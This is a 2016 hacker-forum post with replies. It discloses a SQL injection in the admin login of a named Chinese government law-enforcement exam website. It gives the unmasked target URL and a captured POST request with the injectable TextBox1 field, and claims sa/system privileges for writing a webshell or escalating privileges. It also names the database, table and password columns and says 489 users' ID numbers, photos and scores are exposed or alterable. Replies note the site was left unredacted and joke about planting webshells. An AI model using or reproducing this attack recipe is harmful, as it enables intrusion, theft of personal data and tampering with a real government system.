查看: 12347|回复: 8

廊坊政府执法考试后台注入

[复制链接]
发表于 2016-4-7 15:37:52 | 显示全部楼层 |阅读模式
漏洞存在的网址:http://lffzxzzf1.lf.gov.cn/

廊坊政府执法考试后台

后台存在post注入

------------------------------

POST /login.aspx HTTP/1.1

Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*

Referer: http://lffzxzzf1.lf.gov.cn/login.aspx

Accept-Language: zh-CN

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Host: lffzxzzf1.lf.gov.cn

Content-Length: 328

Pragma: no-cache



__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTMyNDM5ODU3OQ9kFgICAQ9kFgICDw8PFgIeBFRleHQFG%2BeUqOaIt%2BWQjeaIluWvhueggemUmeivr%2B%2B8gWRkZLcal%2FrJ5560OhyzPTmYIs%2BGCAsR&__EVENTVALIDATION=%2FwEWBQKgxv21AQLs0bLrBgLs0fbZDAKM54rGBgK7q7GGCFPpA9cnzfaYRxV2hAhz2wn5DL86&TextBox1=admin&TextBox2=admin&Button1=%E7%99%BB%E9%99%86



TextBox1存在注入


sa权限

可写shell或者达到直接提权的目的


库名zhifakaoshi表名tb_user字段一个用户名一个密码yhm,yhmm这两个

影响489个用户的信息安全 有身份证和照片姓名 还可修改成绩等

system权限可直接提权

评分

参与人数 3人气 +1 i币 +15 收起 理由
blackfish + 5 支持原创
HARDSH + 2
wuyan + 1 + 8 感谢分享

查看全部评分

回复

使用道具 举报

 楼主| 发表于 2016-4-7 15:38:16 | 显示全部楼层
还是没人看
回复 支持 反对

使用道具 举报

发表于 2016-4-7 19:48:36 | 显示全部楼层
朋友,gov的站你也不打个码?
回复 支持 反对

使用道具 举报

发表于 2016-4-7 20:52:30 | 显示全部楼层
可以!找到注入点了
回复 支持 反对

使用道具 举报

发表于 2016-4-7 22:29:45 | 显示全部楼层
我仿佛又看到了一个马场。
回复 支持 反对

使用道具 举报

发表于 2016-4-10 10:56:22 | 显示全部楼层
支持中国红客联盟(ihonker.org)
回复 支持 反对

使用道具 举报

发表于 2016-4-10 16:06:02 | 显示全部楼层
谢谢分享,辛苦了
回复 支持 反对

使用道具 举报

发表于 2016-4-11 16:46:17 | 显示全部楼层
不打码  - -  网站已挂
回复 支持 反对

使用道具 举报

发表于 2016-7-6 16:54:45 | 显示全部楼层

RE: 廊坊政府执法考试后台注入

能加下 好友吗?  作者? 7874026
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 05:30 , Processed in 0.030642 second(s), 13 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部